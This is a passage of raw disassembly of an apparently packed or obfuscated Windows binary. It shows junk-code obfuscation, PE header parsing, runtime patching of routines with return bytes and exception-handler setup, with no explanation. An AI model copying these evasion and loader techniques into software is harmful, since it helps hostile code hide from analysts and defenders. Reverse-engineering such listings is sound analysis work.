; FUNCTION CHUNK AT 00424517 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042476D SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042477C SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00424AB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E86 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00425AE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425D5B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425F81 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426235 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004265B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004266A1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426EFE SIZE 00000031 BYTES
; FUNCTION CHUNK AT 00427028 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427253 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427306 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004277E0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00427881 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427951 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004286F1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00428B34 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428CAA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428DA6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00429008 SIZE 00000008 BYTES
call sub_4279ED
push eax
loc_425BD8: ; CODE XREF: sub_428249:loc_427632�j
ror eax, 0Bh
call sub_425F93
loc_425BE0: ; CODE XREF: hjohnhn9:loc_426344�j
jz loc_427951
jmp loc_424517
sub_425BD2 endp
; ---------------------------------------------------------------------------
not esi
jmp sub_428788
; =============== S U B R O U T I N E =======================================
sub_425BF2 proc near ; CODE XREF: sub_427C9B-AF7�p
; hjohnhn9:00427AE6�j
var_C = dword ptr -0Ch
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00425B48 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00427260 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004281A3 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004290BA SIZE 00000015 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [eax]
or eax, eax
jnz loc_4260A9
jmp loc_427260
sub_425BF2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_425C05: ; CODE XREF: sub_426354:loc_428388�j
mov eax, [ebp-1Ch]
shl eax, 8
mov edx, [ebp-20h]
movzx edx, byte ptr [edx]
loc_425C11: ; CODE XREF: sub_4262C5:loc_428B67�j
or eax, edx
jmp loc_427927
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42355C
loc_425C18: ; CODE XREF: sub_42355C+28BF�j
sbb ebx, 51ADD596h
loc_425C1E: ; CODE XREF: sub_42355C:loc_425C40�j
call sub_424877
mov edx, 0F75CA70h
call sub_4279ED
push eax
jmp loc_428542
; END OF FUNCTION CHUNK FOR sub_42355C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F5A
loc_425C33: ; CODE XREF: sub_426F5A:loc_42365D�j
push edx
mov edx, eax
call sub_42362A
; END OF FUNCTION CHUNK FOR sub_426F5A
; START OF FUNCTION CHUNK FOR sub_427AC0
loc_425C3B: ; CODE XREF: sub_427AC0-33A9�j
jmp loc_4283A1
; END OF FUNCTION CHUNK FOR sub_427AC0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42355C
loc_425C40: ; CODE XREF: sub_42355C:loc_424E9F�j
jz loc_425C1E
jmp loc_425E06
; END OF FUNCTION CHUNK FOR sub_42355C
; =============== S U B R O U T I N E =======================================
sub_425C4B proc near ; DATA XREF: hjohnhn9:00423B7A�o
var_4 = dword ptr -4
xchg eax, [esp+0]
push 1E9165C3h
xchg ebp, [esp+4+var_4]
sub_425C4B endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424698
loc_425C56: ; CODE XREF: sub_424698+4554�j
mov ebx, ebp
pop ebp
and ebx, 0DFC7110Fh
add ebx, 0E17EFEFDh
jmp loc_423928
; END OF FUNCTION CHUNK FOR sub_424698
; ---------------------------------------------------------------------------
test ecx, ebp
jmp loc_42487D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_64. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xor ecx, 95DB5AA9h
jmp sub_423FB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_425C7D: ; CODE XREF: sub_42363F:loc_4279BB�j
mov esp, ebp
pop ebp
mov eax, ds:dword_428B18
or eax, eax
jnz loc_426FC7
jmp loc_424860
; END OF FUNCTION CHUNK FOR sub_42363F
; ---------------------------------------------------------------------------
loc_425C93: ; CODE XREF: hjohnhn9:00423DCA�j
mov ebp, 13519D39h
; =============== S U B R O U T I N E =======================================
sub_425C98 proc near ; CODE XREF: sub_425E5A+5�p
; FUNCTION CHUNK AT 004264F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042877D SIZE 0000000B BYTES
xchg esi, [esp+0]
pop esi
push ecx
mov ecx, eax
jmp loc_4264F0
sub_425C98 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov [esi], eax
jmp sub_425F93
; ---------------------------------------------------------------------------
ror edi, 4
jmp sub_428965
; =============== S U B R O U T I N E =======================================
sub_425CB3 proc near ; CODE XREF: hjohnhn9:004250EA�j
; sub_425BF2+34D2�p
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 004232E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042383A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004240D4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004244B2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004267AC SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00427860 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00427B97 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push 0CE0AB7D1h
xchg edx, [esp+0]
mov ecx, edx
pop edx
loc_425CC2: ; CODE XREF: hjohnhn9:00424BBF�j
rol ecx, 1Fh
xor ecx, 18FAA417h
jmp loc_4232E6
sub_425CB3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4275A3
loc_425CD0: ; CODE XREF: sub_4275A3-1459�j
sub ebp, ebx
loc_425CD2: ; CODE XREF: sub_4275A3:loc_426139�j
push offset loc_424DB0
jmp loc_4231A8
; END OF FUNCTION CHUNK FOR sub_4275A3
; ---------------------------------------------------------------------------
loc_425CDC: ; CODE XREF: hjohnhn9:00427530�j
push eax
ror eax, 14h
mov ds:dword_4233AC, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_425CE7: ; CODE XREF: hjohnhn9:loc_425066�j
; sub_427564+13A8�j
rol eax, 14h
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
jmp nullsub_76
; END OF FUNCTION CHUNK FOR sub_427564
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423753
loc_425CF5: ; CODE XREF: sub_423753+E�j
jnz loc_428BAC
jmp loc_427229
; END OF FUNCTION CHUNK FOR sub_423753
; ---------------------------------------------------------------------------
loc_425D00: ; CODE XREF: hjohnhn9:00428C35�j
or eax, 8F41505Eh
xor eax, 2EDC8CBBh
and eax, 600A4B87h
add eax, 0A0382512h
popf
xchg eax, [esp]
jmp sub_4279ED
; ---------------------------------------------------------------------------
push ebx
jmp loc_424F1A
; =============== S U B R O U T I N E =======================================
sub_425D27 proc near ; CODE XREF: sub_42325E+2�p
; hjohnhn9:00423FA1�j
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
xchg ecx, [esp-4+arg_0]
ror eax, 9
mov ds:dword_428394, eax
retn
sub_425D27 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_425D38: ; CODE XREF: sub_427486+6�j
jmp loc_4271F2
; END OF FUNCTION CHUNK FOR sub_427486
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_425D3D: ; CODE XREF: sub_42466E+1DD6�j
jmp loc_424BD9
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42351F
loc_425D42: ; CODE XREF: sub_42351F+7�j
jmp nullsub_14
; END OF FUNCTION CHUNK FOR sub_42351F
; =============== S U B R O U T I N E =======================================
sub_425D47 proc near ; DATA XREF: hjohnhn9:00427691�o
add eax, 2
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
call sub_4241E1
sub_425D47 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4266B5
loc_425D55: ; CODE XREF: sub_4266B5+4�j
jmp loc_428A6C
; END OF FUNCTION CHUNK FOR sub_4266B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_62. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_425D5B: ; CODE XREF: sub_425BD2+31EB�j
jmp loc_427306
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
loc_425D60: ; CODE XREF: hjohnhn9:00427696�j
jmp locret_427BB2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F5A
loc_425D65: ; CODE XREF: sub_426F5A+9�j
jmp loc_426BA8
; END OF FUNCTION CHUNK FOR sub_426F5A
; ---------------------------------------------------------------------------
loc_425D6A: ; CODE XREF: hjohnhn9:00423B7F�j
jmp locret_423F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_425D6F: ; CODE XREF: sub_4265CD:loc_427FB5�j
jl loc_4235F0
push ebp
jmp sub_423AAF
; END OF FUNCTION CHUNK FOR sub_4265CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236A7
loc_425D7B: ; CODE XREF: sub_4236A7:loc_423BF6�j
add eax, 4
mov ebx, [eax]
push ebx
push 9A5A1A01h
jmp loc_423087
; END OF FUNCTION CHUNK FOR sub_4236A7
; ---------------------------------------------------------------------------
pop edx
push eax
push 0C91257B9h
sbb edx, 3A6CB62Eh
jmp loc_4264B7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_116. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4230E0
loc_425D9E: ; CODE XREF: sub_4230E0+D�j
jmp loc_42772C
; END OF FUNCTION CHUNK FOR sub_4230E0
; ---------------------------------------------------------------------------
loc_425DA3: ; CODE XREF: hjohnhn9:00425EC0�j
jo nullsub_99
; START OF FUNCTION CHUNK FOR sub_42466E
loc_425DA9: ; CODE XREF: sub_42466E:loc_42309F�j
add eax, 34A89E1h
xchg eax, [esp+0]
jmp loc_42797F
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427363
loc_425DB7: ; CODE XREF: sub_427363:loc_4270C0�j
mov large fs:0, esp
mov eax, [eax]
mov eax, 1
jmp loc_427358
; END OF FUNCTION CHUNK FOR sub_427363
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
add eax, offset nullsub_2
mov byte ptr [eax], 0C3h
jnb loc_423515
jmp loc_42462C
; ---------------------------------------------------------------------------
loc_425DDE: ; CODE XREF: hjohnhn9:00427C94�j
jge loc_42390D
; =============== S U B R O U T I N E =======================================
sub_425DE4 proc near ; CODE XREF: sub_426604+7�p
xchg edx, [esp+0]
pop edx
push 0D200AD3Ch
jmp loc_428129
sub_425DE4 endp
; ---------------------------------------------------------------------------
loc_425DF2: ; CODE XREF: hjohnhn9:004274B4�j
pop ecx
rol ecx, 1Bh
xor ecx, 7A9DBC6Fh
add eax, ecx
pop ecx
mov eax, [eax]
jmp loc_42327E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42355C
loc_425E06: ; CODE XREF: sub_42355C+26EA�j
jo loc_42626A
shr eax, 1Ch
adc ecx, 0A57AE9C0h
xor ecx, 0F54B0178h
jmp loc_425C18
; END OF FUNCTION CHUNK FOR sub_42355C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_425E20: ; CODE XREF: sub_425BD2-1CA9�j
; sub_426354:loc_427927�j
mov [ebp-1Ch], eax
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
and eax, 0FFh
mov eax, ds:dword_4256DC[eax*4]
call sub_427B51
loc_425E3A: ; CODE XREF: sub_428829+A�j
jmp loc_425270
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
loc_425E3F: ; CODE XREF: hjohnhn9:0042690D�j
jmp nullsub_124
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244F5
loc_425E44: ; CODE XREF: sub_4244F5+617�j
jmp loc_42681D
; END OF FUNCTION CHUNK FOR sub_4244F5
; =============== S U B R O U T I N E =======================================
sub_425E49 proc near ; CODE XREF: sub_425EEA:loc_423E7B�p
; hjohnhn9:00424A6F�j
xchg ecx, [esp+0]
pop ecx
mov eax, [ebp-4]
push offset sub_428CC9
jmp nullsub_15
sub_425E49 endp
; =============== S U B R O U T I N E =======================================
sub_425E5A proc near
call sub_4279ED
call sub_425C98
sub_425E5A endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_423B05
loc_425E64: ; CODE XREF: sub_423B05+4B2C�j
jmp loc_427EE2
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426475
loc_425E69: ; CODE XREF: sub_426475-2F89�j
jmp loc_42602D
; END OF FUNCTION CHUNK FOR sub_426475
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426C09
loc_425E6E: ; CODE XREF: sub_426C09-35E4�j
xor ecx, 3684023Fh
xor edi, 470493CFh
cmp ecx, 0E7563046h
jmp loc_428F8E
; END OF FUNCTION CHUNK FOR sub_426C09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C0
loc_425E85: ; CODE XREF: sub_4279C0:loc_42507B�j
mov ebx, esi
xchg ebx, [esp+0]
push eax
pop esi
xchg esi, [esp+0]
jmp loc_42446C
; END OF FUNCTION CHUNK FOR sub_4279C0
; =============== S U B R O U T I N E =======================================
sub_425E94 proc near ; CODE XREF: hjohnhn9:0042633A�p
; hjohnhn9:00426A24�j
; FUNCTION CHUNK AT 0042673C SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push edx
push offset sub_428BCF
jmp loc_42673C
sub_425E94 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_44. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C4E
loc_425EA4: ; CODE XREF: sub_428C4E+22�j
jmp loc_426894
; END OF FUNCTION CHUNK FOR sub_428C4E
; =============== S U B R O U T I N E =======================================
sub_425EA9 proc near ; CODE XREF: hjohnhn9:loc_423815�p
; sub_425BD2:loc_4277E0�j ...
; FUNCTION CHUNK AT 00424801 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004289C0 SIZE 00000005 BYTES
mov eax, cs
xor al, al
or eax, eax
jmp loc_4289C0
sub_425EA9 endp
; ---------------------------------------------------------------------------
loc_425EB4: ; CODE XREF: hjohnhn9:00428234�j
jnb loc_4243D9
test ebp, 0EFCFED04h
jmp loc_425DA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_425EC5: ; CODE XREF: sub_426354-17EA�j
mov eax, 6
sub eax, [ebp-0Ch]
mov [ebp-0Ch], eax
loc_425ED0: ; CODE XREF: sub_424B4A:loc_42666C�j
; sub_427805�j ...
mov eax, [ebp-20h]
movzx eax, byte ptr [eax]
mov [ebp-1Ch], eax
jb loc_426E12
jmp loc_424D6D
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
loc_425EE4: ; CODE XREF: hjohnhn9:00426DED�j
sbb eax, 0C96DEF00h
; =============== S U B R O U T I N E =======================================
sub_425EEA proc near ; CODE XREF: sub_427564+D08�p
; FUNCTION CHUNK AT 00423E7B SIZE 00000012 BYTES
xchg edi, [esp+0]
pop edi
pop esi
push 1Ch
lea eax, [ebp-34h]
push eax
jmp loc_423E7B
sub_425EEA endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_425EFB: ; CODE XREF: sub_423CDB+3ED1�j
jmp loc_42869B
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_425F00: ; CODE XREF: sub_426354+2413�j
jge loc_4275D2
; END OF FUNCTION CHUNK FOR sub_426354
; START OF FUNCTION CHUNK FOR sub_427DE6
loc_425F06: ; CODE XREF: sub_427DE6+1F�j
jmp loc_426449
; END OF FUNCTION CHUNK FOR sub_427DE6
; ---------------------------------------------------------------------------
push 0E2CE79D4h
jmp loc_4275CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_425F15: ; CODE XREF: sub_426A78-2D29�j
jle loc_424E99
loc_425F1B: ; CODE XREF: sub_426A78:loc_423D47�j
or eax, 4D94C7ABh
rol eax, 10h
add eax, 188315A2h
mov eax, [eax]
or eax, eax
jnz loc_428510
jmp loc_427436
; END OF FUNCTION CHUNK FOR sub_426A78
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_118. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_425F3A: ; CODE XREF: sub_427852+8�j
jmp loc_428319
; END OF FUNCTION CHUNK FOR sub_427852
; =============== S U B R O U T I N E =======================================
sub_425F3F proc near ; DATA XREF: sub_4290CF-215C�o
; FUNCTION CHUNK AT 00423456 SIZE 00000005 BYTES
dec dword ptr [ebp-24h]
jnz loc_42885B
jmp loc_423456
sub_425F3F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_425F4D: ; CODE XREF: sub_4265CD-3096�j
rol eax, 17h
push esi
mov esi, edi
xchg esi, [esp+0]
jmp loc_4232EB
; END OF FUNCTION CHUNK FOR sub_4265CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C0
loc_425F5B: ; CODE XREF: sub_4279C0:loc_4249D7�j
mov edi, ecx
xchg edi, [esp+0]
push 0FFFFFFF1h
call sub_42472D
push ebx
jmp loc_42507B
; END OF FUNCTION CHUNK FOR sub_4279C0
; ---------------------------------------------------------------------------
locret_425F6D: ; CODE XREF: hjohnhn9:004266F8�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_425F6E: ; CODE XREF: hjohnhn9:00423165�j
; sub_423BC3:loc_427825�j
jmp loc_4241BE
; END OF FUNCTION CHUNK FOR sub_423BC3
; ---------------------------------------------------------------------------
jbe loc_42497C
rol ecx, 17h
jmp sub_42645D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_425F81: ; CODE XREF: sub_425BD2:loc_427028�j
jns loc_423082
jmp loc_4277E0
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
sub esi, edx
jmp loc_423B04
; =============== S U B R O U T I N E =======================================
sub_425F93 proc near ; CODE XREF: sub_425BD2+9�p
; hjohnhn9:00425CA6�j
xchg ebx, [esp+0]
pop ebx
mov ds:dword_423950, eax
retn
sub_425F93 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_425F9E: ; CODE XREF: sub_424819+26C7�j
jmp loc_426A03
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42859A
loc_425FA3: ; CODE XREF: sub_4248B1�j sub_42859A+6�j
rol eax, 0Bh
push eax
call sub_4244F5
jmp nullsub_56
; END OF FUNCTION CHUNK FOR sub_42859A
; ---------------------------------------------------------------------------
loc_425FB1: ; CODE XREF: hjohnhn9:00424DD2�j
mov byte ptr [eax], 0C3h
call nullsub_1
call nullsub_122
call nullsub_124
mov dword ptr [ebp-4], 1
mov eax, 0
or eax, eax
jz loc_4239D3
jmp loc_4281D4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4251EB
loc_425FDC: ; CODE XREF: sub_4251EB:loc_4283BA�j
jz loc_4232DA
push 5CCB0B2Eh
jp loc_424954
jmp loc_4232D1
; END OF FUNCTION CHUNK FOR sub_4251EB
; ---------------------------------------------------------------------------
jnb sub_4283C9
cdq
jmp sub_423E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4238CC
loc_425FFE: ; CODE XREF: sub_4238CC+1A�j
add eax, 3960E5C1h
add eax, ebp
add eax, 43C7FE34h
mov eax, [eax]
xor edx, eax
pop eax
add edx, 2
jmp loc_423F45
; END OF FUNCTION CHUNK FOR sub_4238CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426671
loc_426019: ; CODE XREF: sub_426671+F�j
pop ebp
mov eax, ds:dword_428B04
or eax, eax
jnz loc_428551
jmp loc_427895
; END OF FUNCTION CHUNK FOR sub_426671
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426475
loc_42602D: ; CODE XREF: sub_426475:loc_425E69�j
xchg eax, [esp+4+var_4]
push 7CD0134Eh
pop ecx
xor ecx, 749589EAh
rol ecx, 5
jmp loc_427EA1
; END OF FUNCTION CHUNK FOR sub_426475
; ---------------------------------------------------------------------------
pop ebp
jmp loc_427C99
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_42604A: ; CODE XREF: sub_4260BD+26A�j
shr eax, 15h
test edx, ecx
jmp loc_426D8C
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_426054: ; CODE XREF: sub_424161+30A2�j
adc eax, 0D6D0B437h
loc_42605A: ; CODE XREF: sub_424161+438�j
xor edx, 136ECA97h
add edx, 131DE3E6h
add edx, ebp
add edx, 78F92151h
mov [edx], eax
pop edx
mov dword ptr [ebp-0Ch], 1
jmp loc_425BB8
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42355C
loc_42607D: ; CODE XREF: sub_42355C:loc_42743B�j
sub eax, 6611ACDCh
add eax, 4874857Dh
mov eax, [eax]
or eax, eax
jnz loc_428551
jmp loc_424E9F
; END OF FUNCTION CHUNK FOR sub_42355C
; =============== S U B R O U T I N E =======================================
sub_426098 proc near ; CODE XREF: hjohnhn9:00423006�j
; sub_427805+6�p
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
mov eax, 6
sub eax, [ebp-4]
call sub_424181
loc_4260A9: ; CODE XREF: sub_425BF2+8�j
; sub_42841F+C�j ...
mov edx, [esp-4+arg_0]
mov al, 1
call edx
xor eax, eax
retn
sub_426098 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CC8
loc_4260B3: ; CODE XREF: sub_426CC8+1A10�j
jmp sub_427AEB
; END OF FUNCTION CHUNK FOR sub_426CC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_4260B8: ; CODE XREF: sub_42304F+21�j
; sub_423444+3CB0�j
jmp loc_424218
; END OF FUNCTION CHUNK FOR sub_42304F
; =============== S U B R O U T I N E =======================================
sub_4260BD proc near ; CODE XREF: sub_426475:loc_4234D8�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423A50 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00423BF1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423CA1 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042409B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042497B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00424A12 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424DB8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042604A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426325 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426D8C SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00426E4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426EE5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427431 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042763E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00427714 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042794A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004282E4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428337 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042873A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429032 SIZE 0000000C BYTES
push edi
jmp loc_42873A
sub_4260BD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_4260C3: ; CODE XREF: sub_427C9B:loc_427CB9�j
mov esi, 0C4B77320h
jmp loc_4289DB
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F85
loc_4260CD: ; CODE XREF: sub_426F85+E�j
cmp dword ptr [ebp-4], 0
jz loc_428EEB
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
jmp loc_428D00
; END OF FUNCTION CHUNK FOR sub_426F85
; ---------------------------------------------------------------------------
loc_4260EA: ; CODE XREF: hjohnhn9:004251A2�j
sub esi, 329C18AFh
xor esi, 91F0F70Bh
xchg esi, [esp]
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_4260F9: ; CODE XREF: sub_423BC3+53F7�j
mov eax, [ebp-8]
push ebp
jmp loc_424FE3
; END OF FUNCTION CHUNK FOR sub_423BC3
; ---------------------------------------------------------------------------
loc_426102: ; CODE XREF: hjohnhn9:004266DE�j
mov byte ptr [eax], 64h
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
jmp loc_428621
; ---------------------------------------------------------------------------
loc_426116: ; DATA XREF: sub_426523+1F40�o
inc dword ptr [ebp-10h]
push offset loc_426F35
jmp locret_424EBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_426123: ; CODE XREF: sub_427486:loc_427292�j
; hjohnhn9:004272AE�j
and edx, 6A6446A1h
test edx, 20000h
jmp loc_423246
; END OF FUNCTION CHUNK FOR sub_427486
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4275A3
loc_426134: ; CODE XREF: sub_4275A3:loc_42686B�j
call sub_4230E0
loc_426139: ; CODE XREF: sub_426638:loc_427F44�j
jl loc_425CD2
sbb edx, 0F41EDE25h
push 0B42397E8h
jmp loc_425CD0
; END OF FUNCTION CHUNK FOR sub_4275A3
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_426150: ; DATA XREF: sub_427C9B+9D�o
push 0D5915632h
pop eax
sub eax, 1B5FE3AFh
xor eax, 667D6B26h
add eax, 9C500B56h
add eax, ebp
add eax, 8763DAF1h
push edi
jmp loc_428C28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_426176: ; CODE XREF: sub_427C9B+8FA�j
jge loc_4238AA
xchg ebp, [esi]
jmp loc_424F76
; END OF FUNCTION CHUNK FOR sub_427C9B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_81. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_426184: ; CODE XREF: hjohnhn9:00426B4F�j
jmp loc_4244EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282F8
loc_426189: ; CODE XREF: sub_4282F8-3B09�j
jmp loc_425BC8
; END OF FUNCTION CHUNK FOR sub_4282F8
; ---------------------------------------------------------------------------
dw 0C613h
dd 95CA8157h, 0E978E918h, 0FFFFD55Eh
; ---------------------------------------------------------------------------
loc_42619C: ; CODE XREF: hjohnhn9:00426BA2�j
mov eax, [ebp-1Ch]
mov al, [eax]
mov edx, [ebp-20h]
mov [edx], al
jmp loc_4266CC
; ---------------------------------------------------------------------------
sbb edi, 0ABCEEB72h
add ecx, 3AE5C846h
jmp sub_42841F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426708
loc_4261BC: ; CODE XREF: sub_426708:loc_4264AD�j
mov eax, ds:dword_4233A0
or eax, eax
jnz loc_423B9C
jmp loc_426E5A
; END OF FUNCTION CHUNK FOR sub_426708
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_4261CF: ; CODE XREF: sub_424698+455A�j
